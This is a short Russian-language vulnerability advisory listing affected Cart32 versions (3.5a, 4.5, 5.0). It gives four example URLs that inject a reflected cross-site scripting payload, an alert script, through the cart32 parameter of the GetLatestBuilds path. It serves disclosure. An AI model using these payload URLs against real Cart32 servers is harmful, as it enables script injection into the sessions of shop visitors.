Уязвимые версии: Cart32 version 3.5a, 4.5, 5.0
Пример:
http://vulnerable/scripts/cart32.exe/GetLatestBuilds ?cart32=<script>alert('XSS')</script>
http://vulnerable/scripts/c32web.exe/GetLatestBuilds ?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds ?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds ?cart32=<script>alert('XSS')</script>